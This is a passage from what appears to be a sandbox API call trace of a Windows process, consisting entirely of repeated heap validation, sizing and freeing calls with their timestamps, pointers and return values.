(hHeap=0x660000, dwFlags=0x0, lpMem=0x6769f0) returned 1 [0069.407] GetProcessHeap () returned 0x660000 [0069.407] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x6769f0) returned 0x1fc [0069.407] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6769f0 | out: hHeap=0x660000) returned 1 [0069.407] GetProcessHeap () returned 0x660000 [0069.407] GetProcessHeap () returned 0x660000 [0069.407] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675418) returned 1 [0069.407] GetProcessHeap () returned 0x660000 [0069.407] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675418) returned 0x16 [0069.407] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675418 | out: hHeap=0x660000) returned 1 [0069.407] GetProcessHeap () returned 0x660000 [0069.407] GetProcessHeap () returned 0x660000 [0069.407] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674b88) returned 1 [0069.407] GetProcessHeap () returned 0x660000 [0069.407] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674b88) returned 0x10 [0069.407] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674b88 | out: hHeap=0x660000) returned 1 [0069.407] GetProcessHeap () returned 0x660000 [0069.407] GetProcessHeap () returned 0x660000 [0069.407] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675438) returned 1 [0069.407] GetProcessHeap () returned 0x660000 [0069.407] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675438) returned 0x14 [0069.407] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675438 | out: hHeap=0x660000) returned 1 [0069.407] GetProcessHeap () returned 0x660000 [0069.407] GetProcessHeap () returned 0x660000 [0069.407] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x676630) returned 1 [0069.407] GetProcessHeap () returned 0x660000 [0069.407] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x676630) returned 0xa0 [0069.407] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x676630 | out: hHeap=0x660000) returned 1 [0069.407] GetProcessHeap () returned 0x660000 [0069.407] GetProcessHeap () returned 0x660000 [0069.407] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674c60) returned 1 [0069.407] GetProcessHeap () returned 0x660000 [0069.407] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674c60) returned 0x10 [0069.407] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674c60 | out: hHeap=0x660000) returned 1 [0069.408] GetProcessHeap () returned 0x660000 [0069.408] GetProcessHeap () returned 0x660000 [0069.408] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675258) returned 1 [0069.408] GetProcessHeap () returned 0x660000 [0069.408] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675258) returned 0x14 [0069.408] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675258 | out: hHeap=0x660000) returned 1 [0069.408] GetProcessHeap () returned 0x660000 [0069.408] GetProcessHeap () returned 0x660000 [0069.408] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x66f6f0) returned 1 [0069.408] GetProcessHeap () returned 0x660000 [0069.408] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x66f6f0) returned 0x78 [0069.408] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66f6f0 | out: hHeap=0x660000) returned 1 [0069.408] GetProcessHeap () returned 0x660000 [0069.408] GetProcessHeap () returned 0x660000 [0069.408] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674cd8) returned 1 [0069.408] GetProcessHeap () returned 0x660000 [0069.408] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674cd8) returned 0x10 [0069.408] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674cd8 | out: hHeap=0x660000) returned 1 [0069.408] GetProcessHeap () returned 0x660000 [0069.408] GetProcessHeap () returned 0x660000 [0069.408] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675238) returned 1 [0069.408] GetProcessHeap () returned 0x660000 [0069.408] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675238) returned 0x14 [0069.408] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675238 | out: hHeap=0x660000) returned 1 [0069.408] GetProcessHeap () returned 0x660000 [0069.408] GetProcessHeap () returned 0x660000 [0069.408] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x676968) returned 1 [0069.408] GetProcessHeap () returned 0x660000 [0069.408] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x676968) returned 0x7a [0069.408] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x676968 | out: hHeap=0x660000) returned 1 [0069.408] GetProcessHeap () returned 0x660000 [0069.408] GetProcessHeap () returned 0x660000 [0069.408] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674d20) returned 1 [0069.408] GetProcessHeap () returned 0x660000 [0069.408] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674d20) returned 0x10 [0069.408] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674d20 | out: hHeap=0x660000) returned 1 [0069.408] GetProcessHeap () returned 0x660000 [0069.408] GetProcessHeap () returned 0x660000 [0069.408] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675218) returned 1 [0069.408] GetProcessHeap () returned 0x660000 [0069.409] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675218) returned 0x14 [0069.409] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675218 | out: hHeap=0x660000) returned 1 [0069.409] GetProcessHeap () returned 0x660000 [0069.409] GetProcessHeap () returned 0x660000 [0069.409] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674d08) returned 1 [0069.409] GetProcessHeap () returned 0x660000 [0069.409] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674d08) returned 0xe [0069.409] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674d08 | out: hHeap=0x660000) returned 1 [0069.409] GetProcessHeap () returned 0x660000 [0069.409] GetProcessHeap () returned 0x660000 [0069.409] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674cf0) returned 1 [0069.409] GetProcessHeap () returned 0x660000 [0069.409] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674cf0) returned 0x10 [0069.409] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674cf0 | out: hHeap=0x660000) returned 1 [0069.409] GetProcessHeap () returned 0x660000 [0069.409] GetProcessHeap () returned 0x660000 [0069.409] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x6751f8) returned 1 [0069.409] GetProcessHeap () returned 0x660000 [0069.409] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x6751f8) returned 0x14 [0069.409] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6751f8 | out: hHeap=0x660000) returned 1 [0069.409] GetProcessHeap () returned 0x660000 [0069.409] GetProcessHeap () returned 0x660000 [0069.409] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675a40) returned 1 [0069.409] GetProcessHeap () returned 0x660000 [0069.409] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675a40) returned 0x208 [0069.409] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675a40 | out: hHeap=0x660000) returned 1 [0069.409] GetProcessHeap () returned 0x660000 [0069.409] GetProcessHeap () returned 0x660000 [0069.409] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674c00) returned 1 [0069.409] GetProcessHeap () returned 0x660000 [0069.409] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674c00) returned 0x10 [0069.409] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674c00 | out: hHeap=0x660000) returned 1 [0069.409] GetProcessHeap () returned 0x660000 [0069.409] GetProcessHeap () returned 0x660000 [0069.409] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x6751b8) returned 1 [0069.409] GetProcessHeap () returned 0x660000 [0069.409] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x6751b8) returned 0x14 [0069.409] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6751b8 | out: hHeap=0x660000) returned 1 [0069.410] GetProcessHeap () returned 0x660000 [0069.410] GetProcessHeap () returned 0x660000 [0069.410] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x6766d8) returned 1 [0069.410] GetProcessHeap () returned 0x660000 [0069.410] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x6766d8) returned 0x200 [0069.410] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6766d8 | out: hHeap=0x660000) returned 1 [0069.410] GetProcessHeap () returned 0x660000 [0069.410] GetProcessHeap () returned 0x660000 [0069.410] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674c78) returned 1 [0069.410] GetProcessHeap () returned 0x660000 [0069.410] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674c78) returned 0x10 [0069.410] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674c78 | out: hHeap=0x660000) returned 1 [0069.411] GetProcessHeap () returned 0x660000 [0069.411] GetProcessHeap () returned 0x660000 [0069.411] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675158) returned 1 [0069.411] GetProcessHeap () returned 0x660000 [0069.411] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675158) returned 0x14 [0069.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675158 | out: hHeap=0x660000) returned 1 [0069.411] GetProcessHeap () returned 0x660000 [0069.411] GetProcessHeap () returned 0x660000 [0069.411] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x6752d8) returned 1 [0069.411] GetProcessHeap () returned 0x660000 [0069.411] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x6752d8) returned 0x14 [0069.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6752d8 | out: hHeap=0x660000) returned 1 [0069.411] GetProcessHeap () returned 0x660000 [0069.411] GetProcessHeap () returned 0x660000 [0069.411] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674cc0) returned 1 [0069.411] GetProcessHeap () returned 0x660000 [0069.411] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674cc0) returned 0x10 [0069.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674cc0 | out: hHeap=0x660000) returned 1 [0069.411] GetProcessHeap () returned 0x660000 [0069.411] GetProcessHeap () returned 0x660000 [0069.411] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x6750d8) returned 1 [0069.411] GetProcessHeap () returned 0x660000 [0069.411] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x6750d8) returned 0x14 [0069.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6750d8 | out: hHeap=0x660000) returned 1 [0069.411] GetProcessHeap () returned 0x660000 [0069.411] GetProcessHeap () returned 0x660000 [0069.412] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675318) returned 1 [0069.412] GetProcessHeap () returned 0x660000 [0069.412] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675318) returned 0x16 [0069.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675318 | out: hHeap=0x660000) returned 1 [0069.412] GetProcessHeap () returned 0x660000 [0069.412] GetProcessHeap () returned 0x660000 [0069.412] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674c90) returned 1 [0069.412] GetProcessHeap () returned 0x660000 [0069.412] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674c90) returned 0x10 [0069.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674c90 | out: hHeap=0x660000) returned 1 [0069.412] GetProcessHeap () returned 0x660000 [0069.412] GetProcessHeap () returned 0x660000 [0069.412] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x6750a0) returned 1 [0069.412] GetProcessHeap () returned 0x660000 [0069.412] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x6750a0) returned 0x14 [0069.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6750a0 | out: hHeap=0x660000) returned 1 [0069.412] GetProcessHeap () returned 0x660000 [0069.412] GetProcessHeap () returned 0x660000 [0069.412] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674f70) returned 1 [0069.412] GetProcessHeap () returned 0x660000 [0069.412] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674f70) returned 0x2 [0069.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674f70 | out: hHeap=0x660000) returned 1 [0069.412] GetProcessHeap () returned 0x660000 [0069.412] GetProcessHeap () returned 0x660000 [0069.412] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674f80) returned 1 [0069.412] GetProcessHeap () returned 0x660000 [0069.412] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674f80) returned 0x14 [0069.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674f80 | out: hHeap=0x660000) returned 1 [0069.412] GetProcessHeap () returned 0x660000 [0069.412] GetProcessHeap () returned 0x660000 [0069.412] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674fa0) returned 1 [0069.412] GetProcessHeap () returned 0x660000 [0069.412] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674fa0) returned 0x14 [0069.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674fa0 | out: hHeap=0x660000) returned 1 [0069.412] GetProcessHeap () returned 0x660000 [0069.412] GetProcessHeap () returned 0x660000 [0069.412] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674fc0) returned 1 [0069.412] GetProcessHeap () returned 0x660000 [0069.412] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674fc0) returned 0x14 [0069.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674fc0 | out: hHeap=0x660000) returned 1 [0069.413] GetProcessHeap () returned 0x660000 [0069.413] GetProcessHeap () returned 0x660000 [0069.413] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674fe0) returned 1 [0069.413] GetProcessHeap () returned 0x660000 [0069.413] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674fe0) returned 0x14 [0069.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674fe0 | out: hHeap=0x660000) returned 1 [0069.413] GetProcessHeap () returned 0x660000 [0069.413] GetProcessHeap () returned 0x660000 [0069.413] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675278) returned 1 [0069.413] GetProcessHeap () returned 0x660000 [0069.413] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675278) returned 0x14 [0069.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675278 | out: hHeap=0x660000) returned 1 [0069.413] GetProcessHeap () returned 0x660000 [0069.413] GetProcessHeap () returned 0x660000 [0069.413] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674dc8) returned 1 [0069.413] GetProcessHeap () returned 0x660000 [0069.413] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674dc8) returned 0xc [0069.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674dc8 | out: hHeap=0x660000) returned 1 [0069.413] GetProcessHeap () returned 0x660000 [0069.413] GetProcessHeap () returned 0x660000 [0069.413] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675298) returned 1 [0069.413] GetProcessHeap () returned 0x660000 [0069.413] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675298) returned 0x14 [0069.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675298 | out: hHeap=0x660000) returned 1 [0069.413] GetProcessHeap () returned 0x660000 [0069.413] GetProcessHeap () returned 0x660000 [0069.413] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x6768e0) returned 1 [0069.413] GetProcessHeap () returned 0x660000 [0069.413] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x6768e0) returned 0x30 [0069.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6768e0 | out: hHeap=0x660000) returned 1 [0069.413] GetProcessHeap () returned 0x660000 [0069.413] GetProcessHeap () returned 0x660000 [0069.413] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x6752b8) returned 1 [0069.413] GetProcessHeap () returned 0x660000 [0069.413] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x6752b8) returned 0x14 [0069.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6752b8 | out: hHeap=0x660000) returned 1 [0069.413] GetProcessHeap () returned 0x660000 [0069.413] GetProcessHeap () returned 0x660000 [0069.413] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x676918) returned 1 [0069.413] GetProcessHeap () returned 0x660000 [0069.414] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x676918) returned 0x30 [0069.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x676918 | out: hHeap=0x660000) returned 1 [0069.414] GetProcessHeap () returned 0x660000 [0069.414] GetProcessHeap () returned 0x660000 [0069.414] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x6753f8) returned 1 [0069.414] GetProcessHeap () returned 0x660000 [0069.414] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x6753f8) returned 0x14 [0069.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6753f8 | out: hHeap=0x660000) returned 1 [0069.414] GetProcessHeap () returned 0x660000 [0069.414] GetProcessHeap () returned 0x660000 [0069.414] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675458) returned 1 [0069.414] GetProcessHeap () returned 0x660000 [0069.414] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675458) returned 0x16 [0069.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675458 | out: hHeap=0x660000) returned 1 [0069.414] GetProcessHeap () returned 0x660000 [0069.414] GetProcessHeap () returned 0x660000 [0069.414] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x6753d8) returned 1 [0069.414] GetProcessHeap () returned 0x660000 [0069.414] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x6753d8) returned 0x14 [0069.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6753d8 | out: hHeap=0x660000) returned 1 [0069.414] GetProcessHeap () returned 0x660000 [0069.414] GetProcessHeap () returned 0x660000 [0069.414] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675478) returned 1 [0069.414] GetProcessHeap () returned 0x660000 [0069.414] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675478) returned 0x16 [0069.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675478 | out: hHeap=0x660000) returned 1 [0069.414] GetProcessHeap () returned 0x660000 [0069.414] GetProcessHeap () returned 0x660000 [0069.414] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x6753b8) returned 1 [0069.414] GetProcessHeap () returned 0x660000 [0069.414] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x6753b8) returned 0x14 [0069.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6753b8 | out: hHeap=0x660000) returned 1 [0069.414] GetProcessHeap () returned 0x660000 [0069.414] GetProcessHeap () returned 0x660000 [0069.414] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x6848d0) returned 1 [0069.414] GetProcessHeap () returned 0x660000 [0069.414] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x6848d0) returned 0x82 [0069.414] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6848d0 | out: hHeap=0x660000) returned 1 [0069.414] GetProcessHeap () returned 0x660000 [0069.415] GetProcessHeap () returned 0x660000 [0069.415] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675398) returned 1 [0069.415] GetProcessHeap () returned 0x660000 [0069.415] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675398) returned 0x14 [0069.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675398 | out: hHeap=0x660000) returned 1 [0069.415] GetProcessHeap () returned 0x660000 [0069.415] GetProcessHeap () returned 0x660000 [0069.415] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674d68) returned 1 [0069.415] GetProcessHeap () returned 0x660000 [0069.415] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674d68) returned 0xe [0069.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674d68 | out: hHeap=0x660000) returned 1 [0069.415] GetProcessHeap () returned 0x660000 [0069.415] GetProcessHeap () returned 0x660000 [0069.415] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675378) returned 1 [0069.415] GetProcessHeap () returned 0x660000 [0069.415] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675378) returned 0x14 [0069.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675378 | out: hHeap=0x660000) returned 1 [0069.415] GetProcessHeap () returned 0x660000 [0069.415] GetProcessHeap () returned 0x660000 [0069.415] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674d80) returned 1 [0069.415] GetProcessHeap () returned 0x660000 [0069.415] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674d80) returned 0xc [0069.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674d80 | out: hHeap=0x660000) returned 1 [0069.415] GetProcessHeap () returned 0x660000 [0069.415] GetProcessHeap () returned 0x660000 [0069.415] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675358) returned 1 [0069.415] GetProcessHeap () returned 0x660000 [0069.415] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675358) returned 0x14 [0069.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675358 | out: hHeap=0x660000) returned 1 [0069.415] GetProcessHeap () returned 0x660000 [0069.415] GetProcessHeap () returned 0x660000 [0069.415] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674d98) returned 1 [0069.415] GetProcessHeap () returned 0x660000 [0069.415] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674d98) returned 0xe [0069.415] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674d98 | out: hHeap=0x660000) returned 1 [0069.415] GetProcessHeap () returned 0x660000 [0069.415] GetProcessHeap () returned 0x660000 [0069.415] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675338) returned 1 [0069.415] GetProcessHeap () returned 0x660000 [0069.415] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675338) returned 0x14 [0069.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675338 | out: hHeap=0x660000) returned 1 [0069.416] GetProcessHeap () returned 0x660000 [0069.416] GetProcessHeap () returned 0x660000 [0069.416] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674db0) returned 1 [0069.416] GetProcessHeap () returned 0x660000 [0069.416] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674db0) returned 0x10 [0069.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674db0 | out: hHeap=0x660000) returned 1 [0069.416] GetProcessHeap () returned 0x660000 [0069.416] GetProcessHeap () returned 0x660000 [0069.416] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x6752f8) returned 1 [0069.416] GetProcessHeap () returned 0x660000 [0069.416] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x6752f8) returned 0x14 [0069.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6752f8 | out: hHeap=0x660000) returned 1 [0069.416] GetProcessHeap () returned 0x660000 [0069.416] GetProcessHeap () returned 0x660000 [0069.416] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674bb8) returned 1 [0069.416] GetProcessHeap () returned 0x660000 [0069.416] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674bb8) returned 0x10 [0069.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674bb8 | out: hHeap=0x660000) returned 1 [0069.416] GetProcessHeap () returned 0x660000 [0069.416] GetProcessHeap () returned 0x660000 [0069.416] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675000) returned 1 [0069.416] GetProcessHeap () returned 0x660000 [0069.416] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675000) returned 0x14 [0069.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675000 | out: hHeap=0x660000) returned 1 [0069.416] GetProcessHeap () returned 0x660000 [0069.416] GetProcessHeap () returned 0x660000 [0069.416] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675020) returned 1 [0069.416] GetProcessHeap () returned 0x660000 [0069.416] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675020) returned 0x14 [0069.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675020 | out: hHeap=0x660000) returned 1 [0069.416] GetProcessHeap () returned 0x660000 [0069.416] GetProcessHeap () returned 0x660000 [0069.416] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675040) returned 1 [0069.416] GetProcessHeap () returned 0x660000 [0069.416] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675040) returned 0x14 [0069.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675040 | out: hHeap=0x660000) returned 1 [0069.416] GetProcessHeap () returned 0x660000 [0069.417] GetProcessHeap () returned 0x660000 [0069.417] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675060) returned 1 [0069.417] GetProcessHeap () returned 0x660000 [0069.417] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675060) returned 0x14 [0069.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675060 | out: hHeap=0x660000) returned 1 [0069.417] GetProcessHeap () returned 0x660000 [0069.417] GetProcessHeap () returned 0x660000 [0069.417] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674bd0) returned 1 [0069.417] GetProcessHeap () returned 0x660000 [0069.417] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674bd0) returned 0x10 [0069.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674bd0 | out: hHeap=0x660000) returned 1 [0069.417] GetProcessHeap () returned 0x660000 [0069.417] GetProcessHeap () returned 0x660000 [0069.417] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675080) returned 1 [0069.417] GetProcessHeap () returned 0x660000 [0069.417] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675080) returned 0x14 [0069.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675080 | out: hHeap=0x660000) returned 1 [0069.417] GetProcessHeap () returned 0x660000 [0069.417] GetProcessHeap () returned 0x660000 [0069.417] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x6750f8) returned 1 [0069.417] GetProcessHeap () returned 0x660000 [0069.417] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x6750f8) returned 0x14 [0069.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6750f8 | out: hHeap=0x660000) returned 1 [0069.417] GetProcessHeap () returned 0x660000 [0069.417] GetProcessHeap () returned 0x660000 [0069.417] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675138) returned 1 [0069.417] GetProcessHeap () returned 0x660000 [0069.417] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675138) returned 0x14 [0069.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675138 | out: hHeap=0x660000) returned 1 [0069.417] GetProcessHeap () returned 0x660000 [0069.417] GetProcessHeap () returned 0x660000 [0069.417] HeapValidate 